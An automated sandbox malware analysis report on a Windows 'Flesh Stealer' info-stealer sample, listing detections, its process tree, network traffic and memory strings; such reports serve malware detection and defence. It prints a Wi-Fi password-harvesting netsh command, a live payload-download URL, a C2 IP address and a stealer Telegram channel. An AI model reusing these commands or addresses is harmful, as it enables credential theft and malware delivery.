Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iGxCM2I5u9.exe

Overview

General Information

Sample name:iGxCM2I5u9.exe
Analysis ID:1569093
MD5:8c6fb38b219a123b9340465b8d2dd5f8
SHA1:35242280f551684b9e47726d5f94f1615c0dc76e
SHA256:2960e7ad1d18bf517b5b4edf6e674e5ffdc587a8672cac0b24907a8fae8de59c
Infos:

Detection

Flesh Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Flesh Stealer
Connects to many ports of the same IP (likely port scanning)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • iGxCM2I5u9.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\iGxCM2I5u9.exe" MD5: 8C6FB38B219A123B9340465B8D2DD5F8)
    • cmd.exe (PID: 7976 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chcp.com (PID: 1128 cmdline: chcp 65001 MD5: CA9A549C17932F9CAA154B5528EBD8D4)
      • netsh.exe (PID: 4536 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • findstr.exe (PID: 3340 cmdline: findstr All MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: iGxCM2I5u9.exe PID: 7544JoeSecurity_FleshStealerYara detected Flesh StealerJoe Security

    Sigma Signatures

    Stealing of Sensitive Information

    barindex
    Sigma detected: Capture Wi-Fi password
    Source: Process startedAuthor: Joe Security: Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\iGxCM2I5u9.exe", ParentImage: C:\Users\user\Desktop\iGxCM2I5u9.exe, ParentProcessId: 7544, ParentProcessName: iGxCM2I5u9.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 7976, ProcessName: cmd.exe

    Suricata Signatures

    No Suricata rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: iGxCM2I5u9.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://orange-loris-425181.hostingersite.com/uploads/clean.exeAvira URL Cloud: Label: malware
    Multi AV Scanner detection for submitted file
    Source: iGxCM2I5u9.exeReversingLabs: Detection: 65%
    Machine Learning detection for sample
    Source: iGxCM2I5u9.exeJoe Sandbox ML: detected
    Source: unknownHTTPS traffic detected: 84.32.84.100:443 -> 192.168.11.20:49756 version: TLS 1.2
    Source: iGxCM2I5u9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\Cache\Jump to behavior
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Adobe\Acrobat\DC\SOPHIA\Jump to behavior

    Networking

    barindex
    Connects to many ports of the same IP (likely port scanning)
    Source: global trafficTCP traffic: 89.23.100.233 ports 0,2,3,32089,8,9
    Source: global trafficTCP traffic: 192.168.11.20:49758 -> 89.23.100.233:32089
    Source: global trafficHTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 89.23.100.233 89.23.100.233
    Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
    Source: Joe Sandbox ViewIP Address: 104.16.185.241 104.16.185.241
    Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: unknownDNS query: name: icanhazip.com
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: unknownTCP traffic detected without corresponding DNS query: 89.23.100.233
    Source: global trafficHTTP traffic detected: GET /uploads/clean.exe HTTP/1.1Host: orange-loris-425181.hostingersite.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: orange-loris-425181.hostingersite.com
    Source: global trafficDNS traffic detected: DNS query: icanhazip.com
    Source: global trafficDNS traffic detected: DNS query: 69.170.12.0.in-addr.arpa
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 12:10:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodinglast-modified: Wed, 11 Jan 2023 12:29:40 GMTetag: W/"999-63beabb4-5b41a25ab194c3b4;gz"platform: hostingerpanel: hpanelx-turbo-charged-by: LiteSpeedServer: hcdnx-hcdn-request-id: 209b163506b912c3746eb8f46d41577b-asc-edge5
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103293639339.000001605EBD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/p
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.0000016077957000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103305186713.000001607791D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css
    Source: iGxCM2I5u9.exe, 00000000.00000002.103292458865.000001605CFC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orange-loris-425181.hostingersite.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://orange-loris-425181.hostingersite.com/uploads/clean.exe
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pki.goog/repository/0
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/en-GB/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=fire
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/en-GB/products/firefoxgro.allizom.troppus.
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/FleshStealer
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EF28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605ED89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F059000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F283000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103294178517.000001605F232000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F170000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFCF000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F089000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFFD000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F191000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F068000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFAE000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1D0000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F0A5000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
    Source: iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F159000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606ED5E000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606EFF7000.00000004.00000800.00020000.00000000.sdmp, iGxCM2I5u9.exe, 00000000.00000002.103298710038.000001606F1FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-GB/about/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-GB/contribute/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-GB/firefox/central/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-GB/privacy/firefox/gro.allizom.www.
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpgk
    Source: tmp7AB1.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownHTTPS traffic detected: 84.32.84.100:443 -> 192.168.11.20:49756 version: TLS 1.2
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FFBC7C5B35C0_2_00007FFBC7C5B35C
    Source: C:\Users\user\Desktop\iGxCM2I5u9.exeCode function: 0_2_00007FFBC7C5C10C0_2_00007FFBC7C5C10C
    Source: iGxCM2I5u9.exe, 00000000.00000000.102048799997.000001605CE52000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
    Source: iGxCM2I5u9.exeBinary or memory string: OriginalFilenameSystem.exe" vs iGxCM2I5u9.exe
